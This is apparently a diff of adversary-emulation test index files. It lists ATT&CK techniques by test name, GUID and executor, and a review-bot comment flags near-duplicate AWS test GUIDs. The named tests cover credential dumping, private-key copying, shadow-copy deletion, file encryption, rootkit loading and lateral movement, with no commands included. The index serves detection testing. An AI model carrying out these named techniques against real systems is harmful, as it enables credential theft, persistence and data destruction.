365 defense-evasion T1553.005 Mark-of-the-Web Bypass 2 Mount an ISO image and run executable from the ISO 42f22b00-0242-4afc-a61b-0da05041f9cc powershell
366 defense-evasion T1036.004 Masquerade Task or Service 1 Creating W32Time similar named service using schtasks f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 command_prompt
367 defense-evasion T1036.004 Masquerade Task or Service 2 Creating W32Time similar named service using sc b721c6ef-472c-4263-a0d9-37f1f4ecff66 command_prompt
368 defense-evasion T1036 Masquerading 1 System File Copied to Unusual Location 51005ac7-52e2-45e0-bdab-d17c6d4916cd command_prompt
369 defense-evasion T1036.005 Match Legitimate Name or Location 1 Execute a process from a directory masquerading as the current parent directory. 812c3ab8-94b0-4698-a9bf-9420af23ce24 sh
370 defense-evasion T1112 Modify Registry 1 Modify Registry of Current User Profile - cmd 1324796b-d0f6-455a-b4ae-21ffee6aa6b9 command_prompt
371 defense-evasion T1112 Modify Registry 2 Modify Registry of Local Machine - cmd 282f929a-6bc5-42b8-bd93-960c3ba35afe command_prompt
372 defense-evasion T1112 Modify Registry 3 Modify registry to store logon credentials c0413fb5-33e2-40b7-9b6f-60b29f4a7a18 command_prompt
492 persistence T1546.008 Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
493 persistence T1098 Account Manipulation 1 Admin Account Manipulate 5598f7cb-cf43-455e-883a-f6008c5d46af powershell
494 persistence T1098 Account Manipulation 2 Domain Account and Group Manipulate a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 powershell
495 persistence T1098 Account Manipulation 3 AWS - Create a group and add a user to that group 8822c3b0-d9f9-4daf-a043-49f110a31122 sh
496 persistence T1098.001 Additional Cloud Credentials 1 AWS - Create Access Key and Secret Key 8822c3b0-d9f9-4daf-a043-491160a31122 sh
497 persistence T1546.010 AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
498 persistence T1546.011 Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
499 persistence T1546.011 Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
512 persistence T1574.012 COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
513 persistence T1574.012 COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
514 persistence T1546.001 Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
515 persistence T1136.003 Cloud Account 1 AWS - Create a new IAM user 8d1c2368-b503-40c9-9057-8e42f21c58ad sh
516 persistence T1053.007 Container Orchestration Job 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
517 persistence T1053.007 Container Orchestration Job 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
518 persistence T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
579 persistence T1547.009 Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
580 persistence T1037.005 Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
581 persistence T1543.002 Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
582 persistence T1543.002 Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
583 persistence T1053.006 Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
584 persistence T1505.002 Transport Agent 1 Install MS Exchange Transport Agent Persistence 43e92449-ff60-46e9-83a3-1a38089df94d powershell
585 persistence T1546.005 Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
602 impact T1486 Data Encrypted for Impact 2 Encrypt files using 7z (Linux) 53e6735a-4727-44cc-b35b-237682a151ad bash
603 impact T1486 Data Encrypted for Impact 3 Encrypt files using ccrypt (Linux) 08cbf59f-85da-4369-a5f4-049cffd7709f bash
604 impact T1486 Data Encrypted for Impact 4 Encrypt files using openssl (Linux) 142752dc-ca71-443b-9359-cf6f497315f1 bash
605 impact T1486 Data Encrypted for Impact 5 PureLocker Ransom Note 649349c7-9abf-493b-a7a2-b1aa4d141528 command_prompt
606 impact T1490 Inhibit System Recovery 1 Windows - Delete Volume Shadow Copies 43819286-91a9-4369-90ed-d31fb4da2c01 command_prompt
607 impact T1490 Inhibit System Recovery 2 Windows - Delete Volume Shadow Copies via WMI 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 command_prompt
608 impact T1490 Inhibit System Recovery 3 Windows - wbadmin Delete Windows Backup Catalog 263ba6cb-ea2b-41c9-9d4e-b652dadd002c command_prompt
804 execution T1053.005 Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
805 execution T1569.002 Service Execution 1 Execute a Command as a Service 2382dee2-a75f-49aa-9378-f52df6ed3fb1 command_prompt
806 execution T1569.002 Service Execution 2 Use PsExec to execute a command on a remote host 873106b7-cfed-454b-8680-fa9f6400431c command_prompt
807 execution T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
808 execution T1053.006 Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
809 execution T1059.004 Unix Shell 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
810 execution T1059.004 Unix Shell 2 Command-Line Interface d0c88567-803d-4dca-99b4-7ce65e7b257c sh
832 lateral-movement T1021.002 SMB/Windows Admin Shares 2 Map Admin Share PowerShell 514e9cd7-9207-4882-98b1-c8f791bae3c5 powershell
833 lateral-movement T1021.002 SMB/Windows Admin Shares 3 Copy and Execute File with PsExec 0eb03d41-79e4-4393-8e57-6344856be1cf command_prompt
834 lateral-movement T1021.002 SMB/Windows Admin Shares 4 Execute command writing output to local Admin Share d41aaab5-bdfe-431d-a3d5-c29e9136ff46 command_prompt
835 lateral-movement T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
836 lateral-movement T1021.006 Windows Remote Management 1 Enable Windows Remote Management 9059e8de-3d7d-4954-a322-46161880b9cf powershell
837 lateral-movement T1021.006 Windows Remote Management 2 Invoke-Command 5295bd61-bd7e-4744-9d52-85962a4cf2d6 powershell
838 lateral-movement T1021.006 Windows Remote Management 3 WinRM Access with Evil-WinRM efe86d95-44c4-4509-ae42-7bfd9d1f5b3d powershell
854 command-and-control T1105 Ingress Tool Transfer 11 OSTAP Worming Activity 2ca61766-b456-4fcf-a35a-1233685e1cad command_prompt
855 command-and-control T1105 Ingress Tool Transfer 12 svchost writing a file to a UNC path fa5a2759-41d7-4e13-a19c-e8f28a53566f command_prompt
856 command-and-control T1105 Ingress Tool Transfer 13 Download a File with Windows Defender MpCmdRun.exe 815bef8b-bf91-4b67-be4c-abe4c2a94ccc command_prompt
857 command-and-control T1105 Ingress Tool Transfer 14 whois file download c99a829f-0bb8-4187-b2c6-d47d1df74cab sh
858 command-and-control T1090.001 Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
859 command-and-control T1090.001 Internal Proxy 2 Connection Proxy for macOS UI 648d68c1-8bcd-4486-9abe-71c6655b6a2c sh
860 command-and-control T1090.001 Internal Proxy 3 portproxy reg key b8223ea9-4be2-44a6-b50a-9657a3d4e72a powershell
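Review bot: The two AWS entries added at L158 and L159 carry GUIDs `8822c3b0-d9f9-4daf-a043-49f110a31122` and `8822c3b0-d9f9-4daf-a043-491160a31122`, which differ in only a few characters of the last group and look hand-edited from one another rather than freshly generated; `auto_generated_guid` is the key tooling uses to select a single test, so near-duplicate identifiers invite copy-paste collisions. If this index is generated from the atomic YAML, the correction belongs in the T1098 and T1098.001 test definitions rather than in this file. The other repeated GUIDs in the hunks (Systemd Service, Systemd Timers, Radmin Viewer) appear under different tactics for the same test, which is expected and not the same issue.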
@@ -4,6 +4,7 @@ credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Lo
credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
@@ -11,6 +12,8 @@ credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-49
credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
@@ -42,6 +45,7 @@ privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-
privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
@@ -87,6 +91,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1036.003,Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
@@ -146,10 +151,13 @@ discovery,T1082,System Information Discovery,11,Environment variables discovery
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
persistence,T1098.001,Additional Cloud Credentials,1,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
@@ -164,6 +172,7 @@ persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3
persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
@@ -174,6 +183,7 @@ command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
4 credential-access T1552.003 Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
5 credential-access T1552.007 Container API 1 ListSecrets 43c3a49d-d15c-45e6-b303-f6e177e44a9a bash
6 credential-access T1552.007 Container API 2 Cat the contents of a Kubernetes service account token file 788e0019-a483-45da-bcfe-96353d46820f sh
7 credential-access T1110.004 Credential Stuffing 1 SSH Credential Stuffing From Linux 4f08197a-2a8a-472d-9589-cd2895ef22ad bash
8 credential-access T1552.001 Credentials In Files 2 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
9 credential-access T1552.001 Credentials In Files 5 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
10 credential-access T1056.001 Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
12 credential-access T1552.004 Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
13 credential-access T1552.004 Private Keys 3 Copy Private SSH Keys with CP 7c247dc7-5128-4643-907b-73a76d9135c3 sh
14 credential-access T1552.004 Private Keys 4 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
15 credential-access T1003.007 Proc Filesystem 1 Dump individual process memory with sh (Local) 7e91138a-8e74-456d-a007-973d67a0bb80 sh
16 credential-access T1003.007 Proc Filesystem 2 Dump individual process memory with Python (Local) 437b2003-a20d-4ed8-834c-4964f24eec63 sh
17 collection T1560.002 Archive via Library 1 Compressing data using GZip in Python (Linux) 391f5298-b12d-4636-8482-35d9c17d53a8 bash
18 collection T1560.002 Archive via Library 2 Compressing data using bz2 in Python (Linux) c75612b2-9de0-4d7c-879c-10d7b077072d bash
19 collection T1560.002 Archive via Library 3 Compressing data using zipfile in Python (Linux) 001a042b-859f-44d9-bf81-fd1c4e2200b0 bash
45 privilege-escalation T1548.003 Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
46 privilege-escalation T1548.003 Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
47 privilege-escalation T1543.002 Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
48 privilege-escalation T1543.002 Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
49 privilege-escalation T1053.006 Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
50 privilege-escalation T1546.005 Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
51 privilege-escalation T1546.004 Unix Shell Configuration Modification 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
91 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 7 chown - Change file or folder mode ownership only 967ba79d-f184-4e0e-8d09-6362b3162e99 bash
92 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 8 chown - Change file or folder ownership recursively 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 bash
93 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 9 chattr - Remove immutable file attribute e7469fe2-ad41-4382-8965-99b94dd3c13f sh
94 defense-evasion T1036.005 Match Legitimate Name or Location 1 Execute a process from a directory masquerading as the current parent directory. 812c3ab8-94b0-4698-a9bf-9420af23ce24 sh
95 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
96 defense-evasion T1036.003 Rename System Utilities 2 Masquerading as Linux crond process. a315bfff-7a98-403b-b442-2ea1b255e556 sh
97 defense-evasion T1014 Rootkit 1 Loadable Kernel Module based Rootkit dfb50072-e45a-4c75-a17e-a484809c8553 sh
151 discovery T1016 System Network Configuration Discovery 3 System Network Configuration Discovery c141bbdb-7fca-4254-9fd6-f47e79447e17 sh
152 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
153 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
154 persistence T1098 Account Manipulation 3 AWS - Create a group and add a user to that group 8822c3b0-d9f9-4daf-a043-49f110a31122 sh
155 persistence T1098.001 Additional Cloud Credentials 1 AWS - Create Access Key and Secret Key 8822c3b0-d9f9-4daf-a043-491160a31122 sh
156 persistence T1053.001 At (Linux) 1 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
157 persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
158 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
159 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
160 persistence T1136.003 Cloud Account 1 AWS - Create a new IAM user 8d1c2368-b503-40c9-9057-8e42f21c58ad sh
161 persistence T1053.007 Container Orchestration Job 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
162 persistence T1053.007 Container Orchestration Job 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
163 persistence T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
172 persistence T1037.004 RC Scripts 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
173 persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc bash
174 persistence T1543.002 Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
175 persistence T1543.002 Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
176 persistence T1053.006 Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
177 persistence T1546.005 Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
178 persistence T1546.004 Unix Shell Configuration Modification 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
183 command-and-control T1105 Ingress Tool Transfer 4 scp remote file copy (pull) b9d22b9a-9778-4426-abf0-568ea64e9c33 bash
184 command-and-control T1105 Ingress Tool Transfer 5 sftp remote file copy (push) f564c297-7978-4aa9-b37a-d90477feea4e bash
185 command-and-control T1105 Ingress Tool Transfer 6 sftp remote file copy (pull) 0139dba1-f391-405e-a4f5-f3989f2c88ef bash
186 command-and-control T1105 Ingress Tool Transfer 14 whois file download c99a829f-0bb8-4187-b2c6-d47d1df74cab sh
187 command-and-control T1090.001 Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
188 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
189 command-and-control T1132.001 Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
@@ -1,5 +1,6 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
@@ -74,6 +75,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
@@ -157,6 +159,7 @@ command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 credential-access T1552.003 Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
3 credential-access T1110.004 Credential Stuffing 2 SSH Credential Stuffing From MacOS d546a3d9-0be5-40c7-ad82-5a7d79e1b66b bash
4 credential-access T1552.001 Credentials In Files 1 Extract Browser and System credentials with LaZagne 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 bash
5 credential-access T1552.001 Credentials In Files 2 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
6 credential-access T1552.001 Credentials In Files 5 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
75 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 7 chown - Change file or folder mode ownership only 967ba79d-f184-4e0e-8d09-6362b3162e99 bash
76 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 8 chown - Change file or folder ownership recursively 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 bash
77 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 9 chattr - Remove immutable file attribute e7469fe2-ad41-4382-8965-99b94dd3c13f sh
78 defense-evasion T1036.005 Match Legitimate Name or Location 1 Execute a process from a directory masquerading as the current parent directory. 812c3ab8-94b0-4698-a9bf-9420af23ce24 sh
79 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
80 defense-evasion T1548.001 Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
81 defense-evasion T1548.001 Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
159 command-and-control T1105 Ingress Tool Transfer 4 scp remote file copy (pull) b9d22b9a-9778-4426-abf0-568ea64e9c33 bash
160 command-and-control T1105 Ingress Tool Transfer 5 sftp remote file copy (push) f564c297-7978-4aa9-b37a-d90477feea4e bash
161 command-and-control T1105 Ingress Tool Transfer 6 sftp remote file copy (pull) 0139dba1-f391-405e-a4f5-f3989f2c88ef bash
162 command-and-control T1105 Ingress Tool Transfer 14 whois file download c99a829f-0bb8-4187-b2c6-d47d1df74cab sh
163 command-and-control T1090.001 Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
164 command-and-control T1090.001 Internal Proxy 2 Connection Proxy for macOS UI 648d68c1-8bcd-4486-9abe-71c6655b6a2c sh
165 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
+13 -5
@@ -3,6 +3,8 @@ credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt
credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
